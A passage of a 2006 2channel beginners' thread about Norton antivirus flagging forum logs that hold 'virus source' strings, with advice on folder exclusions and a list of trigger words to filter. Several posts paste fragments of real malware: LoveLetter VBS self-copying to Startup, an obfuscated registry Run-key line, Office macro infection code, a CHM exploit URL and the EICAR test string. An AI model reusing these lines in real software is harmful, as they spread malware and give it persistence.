> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、

> 遮断解除してok。で、ok。

659 名前:ひよこ名無しさん [2006/09/01(金) 17:54:57 ID:O8GwKufV]
てす

660 名前:ひよこ名無しさん mailto:age [2006/09/01(金) 19:19:06 ID:???]


661 名前:ひよこ名無しさん mailto:sage [2006/09/05(火) 22:30:31 ID:???]
#include <mmlite.h>
#include <stdlib.h>
#include <tchar.h>
UINT __cdecl _ttoh(const _TCHAR *String)
{
UINT Value = 0, Digit;
_TCHAR c;
while ((c = *String++) != _EOS) {
if (c >= '0' && c <= '9') Digit = (UINT) (c - '0');
else if (c >= 'a' && c <= 'f') Digit = (UINT) (c - 'a') + 10;
else if (c >= 'A' && c <= 'F') Digit = (UINT) (c - 'A') + 10;
else break;
Value = (Value << 4) + Digit;
}
return Value;
}


662 名前:ひよこ名無しさん mailto:sage [2006/09/10(日) 21:32:48 ID:???]

>>1

>>2chブラウザのログ保存フォルダを「除外」に設定。

これがどういうことかもうすこし詳しく説明してください。

2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
除外に認定とは、何の除外に認定すればいいのでしょうか。

これだけでは全く意味がわかりません。


663 名前:<body onload=window()> mailto:<body onload=window()> [2006/09/10(日) 22:26:11 ID:???]
[ 自主制作映画 ] [ ジャッカル ] 第 0012 話 ジャッカルがあるさ ( Rev 0001 ) ( 低画質 Ver ).avi 7,177,218 07818b50961750fbaef7124384ac2e70
[ 自主制作映画 ] [ ジャッカル ] 第 0037 話 クッキング・オブ・ジャッカル II ( Rev 0004 ) ( 低画質 Ver ).avi 9,789,864 22b1bd0222641a2ca3cdeb2176170e1b
!(映画アニメ) ドラえもん のび太と雲の王国.avi 361,081,856 65f122004a3545aac6ae276a9765bb3c
## ひぐらしのなく頃に - 暇潰し編 - 其の壱 「ヒナミザワ」.avi 147,861,504 d85b4c07df470706aae626d5c8579571
##(ドラマ)恋の時間 第07話[704×396 DivX6.xxHe-3].avi 378,019,316 53f9c9cba3b31e05d934d3e2bb0b8f3d
#289 ダウンタウンのガキの使いやあらへんで 第289回 [1995.09.03] 今日我々は豚を食べる!!+トーク.avi 143,990,332 7616f03362cb813a456f5844a5bdb956
#DMS Night24.com アナルセックス サンドイッチ あや.avi 724,464,291 751e423a7fd2f543cbb3e624048051e0

664 名前:ひよこ名無しさん mailto:sage [2006/09/10(日) 22:30:08 ID:???]
>>662
> 2chブラウザのログ保存フォルダとは、どこにあるのでしょうか。
使っている2ch専用ブラウザによって違います。
専用ブラウザを使っていない人には関係ありません。

> 除外に認定とは、何の除外に認定すればいいのでしょうか。
ウイルス対策ソフトの検知対象から除外するように設定します。
やり方はウイルス対策ソフトによって違います。
除外設定(「認定」ではなく「設定」)ができないウイルス対策ソフトもあります。

> これだけでは全く意味がわかりません。
以上の説明で全く意味がわからないなら、当面は気にする必要ありません。
実際にその現象に遭遇すれば自然とわかるようになるでしょう。

665 名前:662 mailto:sage [2006/09/11(月) 19:21:09 ID:???]
>>664
               ミミ ヽヽヽヽリリノノノノ
              ミ   ,,、,、,、,、,、,、,、、 彡  
          r、r.r 、l   i''"         i彡
         r |_,|_,|_,||  」    /'  '\ |
         |_,|_,|_,|/⌒/    -・=-, 、-・=-│
         |_,|_,|_人そ(^i     ノ( 、_, )ヽ |  ・・・で?
         | )   ヽノ |.   ノ   !!   |
         |  `".`´  ノ     ノ ̄i   |
         人  入_ノ´    ヽニニノ  ノ\
       /  \_/\\         /|\\
             /   \ ト ───イ/   ヽヽ




666 名前:ひよこ名無しさん mailto:sage [2006/09/13(水) 01:41:38 ID:???]
■2ちゃんねる 初心者が安心して質問できるスレッドガイダンス (ノートントラップ全般への対策法)
ttp://ansitu.xrea.jp/guidance/?Trap#NortonTrap

■2ch NIS問題まとめページ
ttp://mickey.mirv.net/2chnis.html

■特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7

・上記設定でまだ反応がある場合は、「専ブラプログラムフォルダ丸ごと」も同様に除外に追加してみて下さい。
・2ちゃんねる専用ブラウザの読み込み禁止単語機能に、
「v bs」、「O nload」、「o nload」、「=w indow」、「L OVE-LETTER」、「M acro」、「n osuch」、「E ICAR-STANDARD-ANTIVIRUS-TEST」
などの 単語を登録しておきましょう。(※ 単語の途中一箇所スペース空けてるんで詰めて登録して下さい)
・各専用ブラウザのスレッド情報も参照して下さい。

・NIS(NPF)のファイアーウォールを誤作動させるコード文字列に関して → 応急対策を参照
・タスクトレイのノートンアイコンをクリック → NISを無効にする (5分) →
NIS無効中に専用ブラウザでスレッドをリロード取得 → NISを有効に戻す (※この方法でもNPFトラップ回避可能)

■いきいき Wiki - ノートンインターネットセキュリティに関するFAQ
info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq00


667 名前:ひよこ名無しさん mailto:sage [2006/09/13(水) 18:00:04 ID:???]
Norton Anti Virus 2003です。

>専用ブラウザのログ保存フォルダを「除外」に設定。
オプション→Norton Anti Virus→除外→新規→項目→フォルダが開いているアイコン→フォルダの参照から2chブラウザのログ保存フォルダを選んでクリック→項目のOKをクリック。
>◆2004/2003はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をしてください。

手動で探しても、ウイルスソースが貼られたログは自動的に破棄されてしまっているので.datを選択することができません。idxだけ保存されていますが除外しても変わりなしです。
どうすれば見れるようになりますか?

668 名前:ひよこ名無しさん mailto:sage [2006/09/14(木) 18:29:19 ID:???]
>>667
自分が引用してる文章をよく読めばわかるだろうが
datやidxなどの「ファイル」を除外するのではない
「フォルダ」を正しく除外していればログが自動的に破棄されることはない

669 名前:ひよこ名無しさん mailto:sage [2006/09/14(木) 20:59:51 ID:???]
>>668
言われてやっと気付きました。ありがとうございます

670 名前:ひよこ名無しさん mailto:sage [2006/09/14(木) 22:06:23 ID:???]
Norton Anti Virus 2004を使用しています。
手動スキャンとAuto-ProtectでLogフォルダの除外と
ttp://mickey.mirv.net/2chnis.html ←の対処はしてありますが、
たまーに一部のウイルスソースに引っかかってしまいます。
そうなると、しばらくインターネットセキュリティを無効ししないとならなくなります。
例えば最近だと、下記のウイルスソースです。

両方なのか、片方なのか分かりませんがウイルス警告がでます。
対処方法はありますか?

671 名前:670 mailto:sage [2006/09/14(木) 22:06:56 ID:???]
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

672 名前:670 mailto:sage [2006/09/14(木) 22:07:27 ID:???]
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0


673 名前:670 mailto:sage [2006/09/14(木) 22:08:40 ID:???]
といった感じのものです。
671か672かは分かりませんがノートンが反応してしまいます。

674 名前:670 mailto:sage [2006/09/14(木) 22:20:18 ID:???]
今やってみたのですが671と672ではノートンは反応しませんでした。
すいません、他のやつだったのかな?

675 名前:ひよこ名無しさん mailto:sage [2006/09/14(木) 23:24:15 ID:???]
>>673-674
貼るな
他人の迷惑も考えろ。




676 名前:<body onload=window()> mailto:<body onload=window()> [2006/09/14(木) 23:57:48 ID:???]
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0



677 名前:670 mailto:sage [2006/09/15(金) 09:02:47 ID:???]
>>675
スマン

>>676だと何にも反応しないんだよな
反応するときはなんなのかな?






[ 続きを読む ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<258KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef